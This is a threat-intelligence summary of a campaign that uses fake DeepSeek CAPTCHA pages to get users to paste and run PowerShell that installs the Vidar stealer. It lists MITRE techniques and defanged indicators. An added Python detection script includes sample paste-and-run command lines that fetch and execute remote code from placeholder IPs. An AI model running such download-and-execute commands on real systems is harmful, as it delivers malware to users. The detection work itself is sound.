DeepSeek Lure Using CAPTCHAs To Spread Malware

The article describes a malware campaign that trades on the popularity of the DeepSeek AI chatbot through brand impersonation. The operators register look-alike DeepSeek domains that serve fake CAPTCHA pages; the page performs a clipboard injection, placing a malicious PowerShell command on the visitor's clipboard, and relies on the user to run it, which delivers the Vidar information stealer. Vidar then uses legitimate services, Telegram and Steam, for command-and-control communication (the listed indicators are a Steam profile and a Telegram channel). The speed at which generative AI tools are adopted makes their brands attractive lures, which is why organizations need policies and controls governing the use of such tools. Affected: DeepSeek AI, users, organizations utilizing AI technology

Keypoints :

  • Cybercriminals are exploiting the popularity of DeepSeek's brand by registering look-alike domains to deceive users.
  • Fake CAPTCHA pages on those domains perform clipboard injection, placing a malicious PowerShell command on the clipboard for the victim to execute.
  • The Vidar information stealer is used to harvest sensitive data, including user credentials and cryptocurrency wallet information.
  • Legitimate platforms such as Telegram and Steam are abused for command-and-control communication.
  • Organizations need stringent policies and controls governing the use of generative AI tools to mitigate the risk of such lures.
  • ThreatLabz identified numerous fraudulent domains impersonating DeepSeek during its investigation.
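The clipboard-injection step leaves a characteristic endpoint trail: a scripting host launched interactively (the Run dialog is hosted by explorer.exe) with a hidden window, safety flags disabled, a download cradle, and often a reassuring "CAPTCHA" string appended so the Run dialog shows only that text. The following Python script is an added illustration of a detection heuristic and is not code from the Zscaler report; the event field names, the scoring weights, the decoy-text pattern and the sample events (including the TEST-NET IP addresses) are all constructed assumptions, not indicators from the campaign.

```python
"""Heuristic detection of 'paste-and-run' PowerShell following a fake-CAPTCHA
clipboard injection. Added example, not from the Zscaler report. The event
schema ('image', 'parent', 'cmdline'), the weights and the sample log lines
below are constructed for illustration."""
import re

# Parents a victim typically pastes into: the Run dialog (explorer.exe) or a
# fresh terminal. Assumption: adjust to your EDR's process naming.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Flags that hide the window or disable safety rails: one point each.
HARDENING_BYPASS = [
    re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(?:nop|noprofile)\b", re.I),
    re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
]
# Download-and-execute cradles: two points if any matches.
CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|invoke-expression|\biex\b|mshta\s+https?://",
    re.I,
)
# Decoy text appended so the Run dialog shows a reassuring message instead of
# the command (assumed ClickFix-style pattern, not quoted from the report).
DECOY = re.compile(r"not\s+a\s+robot|captcha|human\s+verification", re.I)

ALERT_THRESHOLD = 4  # assumed cut-off; tune against your own baseline


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    score, reasons = 0, []
    if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"{image} launched interactively from {parent}")
    for pat in HARDENING_BYPASS:
        if pat.search(cmd):
            score += 1
            reasons.append(f"bypass flag matching {pat.pattern!r}")
    if CRADLE.search(cmd):
        score += 2
        reasons.append("download-and-execute cradle")
    if DECOY.search(cmd):
        score += 2
        reasons.append("CAPTCHA decoy text in command line")
    return score, reasons


def find_alerts(events, threshold=ALERT_THRESHOLD):
    """Return the events whose score reaches the threshold, with reasons."""
    alerts = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"event": event, "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry; IPs are TEST-NET ranges).
SAMPLE_EVENTS = [
    # 1. User simply opened a PowerShell window from the Start menu.
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'},
    # 2. Paste-and-run: hidden window, rails off, cradle, decoy text.
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (iwr http://198.51.100.10/c.txt)" '
                '# "I am not a robot - reCAPTCHA Verification ID: 4821"'},
    # 3. Legitimate scheduled script: same flags, but a non-interactive parent.
    {"image": "powershell.exe", "parent": "svchost.exe",
     "cmdline": "powershell.exe -nop -ep bypass -File C:\\scripts\\backup.ps1"},
    # 4. mshta variant pasted into the Run dialog.
    {"image": "mshta.exe", "parent": "explorer.exe",
     "cmdline": "mshta https://203.0.113.7/verify.hta"},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert["score"], alert["event"]["cmdline"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

Only events 2 and 4 cross the threshold: the interactive parent alone (event 1) and the bypass flags alone under a service parent (event 3) each score 2, which is what keeps ordinary admin scripting out of the alert queue while the combination the lure produces stands out.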

MITRE Techniques :

  • T1071.001 – Application Layer Protocol: Web Protocols: Vidar contacts Telegram and Steam profile pages over HTTPS for command-and-control communication.
  • T1059.001 – Command and Scripting Interpreter: PowerShell: The malicious PowerShell command placed on the clipboard by the fake CAPTCHA page is executed on the victim's host.
  • T1204.004 – User Execution: Malicious Copy and Paste: The campaign relies on the victim following the deceptive website's instructions to paste and run the injected command.
  • T1222 – File and Directory Permissions Modification: Manipulating permissions during the execution of Vidar.
  • T1588.001 – Obtain Capabilities: Malware: Use of the Vidar information stealer to extract sensitive information.

Indicator of Compromise :

  • [URL] steamcommunity[.]com/profiles/76561199825403037
  • [URL] t[.]me/b4cha00
  • [IP Address] 77.239.117[.]222
  • [IP Address] 95.216.178[.]57
  • [IP Address] 95.217.246[.]174

Full Story: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware